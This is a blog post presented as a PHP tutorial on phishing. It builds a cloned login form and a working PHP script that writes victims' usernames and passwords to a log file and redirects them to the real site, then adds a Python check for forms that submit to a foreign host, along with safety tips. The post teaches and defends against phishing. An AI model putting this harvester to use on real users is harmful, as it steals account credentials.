Wednesday, July 10, 2013

Phishing Attack Explained

This is here because my web service provider blocked my IP every time I tried to publish it on my blog.
Anyway, here it is, part of your PHP tutorial.


Today I'll talk about phishing attacks. If you are thinking of hacking Facebook accounts after reading this tutorial, or think I am going to help you hack someone, close the tab right now. I am just explaining the source code of a phishing scenario.
Phishing is not hacking in the technical sense; it is social engineering. The attacker fools the users of a website into handing over their own credentials.

Scenario:
Manish is a user of some chat room, and his friend Tushar is a good programmer who knows some cool tricks.
Tushar posted a link while chatting with Manish, maybe something like this:

Visit this cool site http://xyz.ghte.com, it'll give you a free recharge, or play this game and become the lucky winner of one lakh rupees.
Manish gets excited and wants to see what the site is all about. He clicks the link and nothing much happens: it looks like the login page of his chat room, so he assumes there will be something after login. He logs in, and nothing happens; it is the same chat room.

But the day after this incident, when Manish tried to log in to his chat room, it said "Wrong Password". He tried many times, but the result was still the same: "wrong password".

So what happened ...?

Manish got hacked by Tushar. How? Let's see:

Code:
Let us assume this is the login page of the chat room:
<html>
<body>
<form action="login.php" method="post">
Name:<br />
<input name="user" type="text" /><br />
pass:<br />
<input name="pass" type="password" />
<input name="" type="submit" />
</form>
</body>
</html>


There is nothing special about this code: it contains a form with two fields, name and password, and when a user enters his name and password he is taken to the chat room.
What Tushar did is copy the source code of the login page and change the action attribute from "login.php" to his own crafted page, "phish.php". Now his login page looks like this:
<html>
<body>
<form action="phish.php" method="post">
Name:<br />
<input name="user" type="text" /><br />
pass:<br />
<input name="pass" type="password" />
<input name="" type="submit" />
</form>
</body>
</html>

Note the action attribute. It is a relative path, so the browser resolves it against the page it loaded the form from: once this copy is hosted on Tushar's domain, the credentials go to Tushar's domain, not to the chat room.
He created a page called phish.php to receive the submitted form. phish.php looks something like this:
<?php
// Send the victim straight on to the real login page. header() only queues
// the redirect; without an exit() the script keeps running, so the logging
// below still happens. Nothing may be output before this line, or the
// redirect header cannot be sent.
header("location:http://chatroom.com/login.php");
// "a" = append mode: create logs.txt if it does not exist, otherwise add
// to the end, so every victim's credentials land in the same file.
$handle=fopen("logs.txt","a");
// Every field the victim's browser submitted arrives in $_POST
// (here: user and pass). Write "name=value" for each of them.
foreach($_POST as $var=>$value){
    fwrite($handle,$var);
    fwrite($handle,"=");
    fwrite($handle,$value);
}
fclose($handle);
?>

and he uploaded both files to his domain, http://xyz.ghte.com.
Explaining the code:
header() sends an HTTP Location redirect, so after "logging in" the victim lands on the real chat room and never notices anything. Because there is no exit() after header(), PHP keeps executing the script, which is what lets the logging still run. Nothing may be printed before header() is called, otherwise the redirect cannot be sent.
Next he creates a file handle, $handle, by opening a text file named logs.txt in append mode ("a"): the file is created if it does not exist, and each new write goes at the end, so every victim's credentials are added to the same file. Then he loops over $_POST: for every field the form submitted, $var holds the input's name and $value holds what the victim typed. fwrite writes the name, an "=" and the value into logs.txt, with nothing separating one field from the next, so the file looks something like this:

user=manishpass=manish1234


Tushar can now read Manish's username and password from logs.txt. That is how Manish got hacked.
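The whole trick rests on where the form's action actually points once the copied page is served from the attacker's domain. The check below is an added example, not code from the original post: it parses a login page the way a browser would, resolves each password-bearing form's action against the URL the page was loaded from, and flags any form that submits to a host other than the site the user thinks they are logging in to. The function names, the ORIGINAL_PAGE and CLONED_PAGE samples (reconstructed from the two forms shown above) and the path login.html on the attacker's domain are assumptions made for the example.

```python
"""Flag login forms whose submit target is not the legitimate site (added example)."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _FormScanner(HTMLParser):
    """Collect every <form> on the page and whether it carries a password field."""

    def __init__(self):
        super().__init__()
        self.forms = []        # one dict per form: {"action": str, "password": bool}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing or empty action means "post back to the page itself".
            self._current = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def credential_targets(page_url, html):
    """Absolute URL each password-bearing form submits to, resolved like a browser does."""
    scanner = _FormScanner()
    scanner.feed(html)
    return [urljoin(page_url, f["action"]) for f in scanner.forms if f["password"]]


def find_phishing_forms(page_url, html, legitimate_host):
    """Submit targets whose host is not the site the user believes they are logging in to."""
    legit = legitimate_host.lower()
    return [t for t in credential_targets(page_url, html)
            if (urlsplit(t).hostname or "").lower() != legit]


# Constructed samples: the chat room's real login form and Tushar's copy,
# which differ only in the action attribute.
ORIGINAL_PAGE = """<html><body>
<form action="login.php" method="post">
Name:<br /><input name="user" type="text" /><br />
pass:<br /><input name="pass" type="password" />
<input name="" type="submit" />
</form></body></html>"""

CLONED_PAGE = ORIGINAL_PAGE.replace('action="login.php"', 'action="phish.php"')


if __name__ == "__main__":
    # Served by the real site, the form posts to the real site: nothing to report.
    print(find_phishing_forms("http://chatroom.com/login.php", ORIGINAL_PAGE, "chatroom.com"))
    # The copy served from xyz.ghte.com resolves "phish.php" against that domain,
    # so the credentials would go to http://xyz.ghte.com/phish.php.
    print(find_phishing_forms("http://xyz.ghte.com/login.html", CLONED_PAGE, "chatroom.com"))
```

The check only sees what the HTML says. A page can just as well submit the fields with JavaScript, and some legitimate sites post logins to a separate sign-on host, so treat a hit as something to look at, not as proof on its own; the address bar remains the first thing to check.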

Caution :
Never click an unknown link.
Always check the address bar before logging in: a copied page looks identical to the real one, so the domain in the URL is the only thing that tells the real site from the fake.
If you find a phishing page imitating a website, report it to that site's administrator.

Surf Safe.

3 comments:

  1. nice post dude... Good work with PHP... Impressive...

    1. hello Manish, I'm a starter in this field. Can you tell me in detail what that PHP script is and how it works?
